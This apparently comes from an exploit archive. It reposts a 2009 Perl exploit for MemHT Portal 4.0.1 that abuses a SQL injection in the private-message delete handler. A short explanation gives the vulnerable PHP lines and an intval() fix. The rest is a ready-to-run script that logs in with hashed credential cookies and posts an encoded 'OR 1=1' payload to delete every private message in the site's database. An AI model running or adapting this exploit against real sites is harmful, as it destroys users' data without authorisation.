Home / os / win10

memhtportal-delete.txt

Posted on 16 February 2009

#!/usr/bin/perl
# MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit
# by yeat - staker[at]hotmail[dot]it

<<Details;

Note:

1- works regardless of php.ini settings.
2- blind sql injection benchmark() method is possible.
3- don't add me on msn messenger.
4- Thanks to evilsocket && Sir Dark.
5- MemHT is a good content management system but it has some security problem.
6- http://milw0rm.com/exploits/7859
security patch: http://www.memht.com/forum_thread_17756_FixPatch-4-0-1.html

/pages/pvtmsg/index.php / Line: 851 -867

<?php


}

break;

case "deleteSelected":

if (isset($_POST['deletenewpm'])) {
foreach ($_POST['deletenewpm'] as $value) {
$dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
}
}
if (isset($_POST['deletepm'])) {
foreach ($_POST['deletepm'] as $value) {
$dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
}
}

?>


ok then foreach ($_POST['deletenewpm'] as $value)

deletenewpm[]= $value ;) so if we send a evil code like this:
1 OR 1=1 we'll delete all messages from mysql database

Possible Fix:

Line: 859 && 864

Edit $dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
Fix: $dblink->query("DELETE FROM memht_pvtmsg WHERE id=".intval($value));



regards :)



Details


use IO::Socket;
use Digest::MD5('md5_hex');

our ($host,$path,$id,$username,$password) = @ARGV;


if (@ARGV != 5) {

print "
+--------------------------------------------------------------------+
",
"
| MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit |
",
"
+--------------------------------------------------------------------+
",
"
by yeat - staker[at]hotmail[dot]it
",
"
Usage     + perl $0 [host] [path] [id] [username] [password]
",
"
Host      + localhost
",
"
Path      + /MemHT
",
"
ID        + your user id
",
"
Password  + your password
";
exit;
}

else {

my $html = undef;
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto    => 'tcp',
) or die $!;

my $post = "deletenewpm[]=x31x20x4Fx52x20x31x3Dx31".
"&Submit.x=34".
"&Submit.y=9";

my $auth = cookies();

my $data = "POST /$path/index.php?page=pvtmsg&op=deleteSelected HTTP/1.1
".
"Host: $host
".
"User-Agent: Lynx (textmode)
".
"Cookie: $auth
".
"Content-Type: application/x-www-form-urlencoded
".
"Content-Length: ".length($post)."

$post

".
"Connection: close

";

$sock->send($data);

while (<$sock>) {
$html .= $_;
}

if ($html =~ /Private Messages/i) {
print "Exploit successfull,all messages deleted.
";
}
else {
print "Exploit failed!
";
}
}


sub cookies
{
$username = md5_hex($username);
$password = md5_hex($password);

return "login_user=$id#$username#$password";
}

 

TOP

Malware :

Exploits :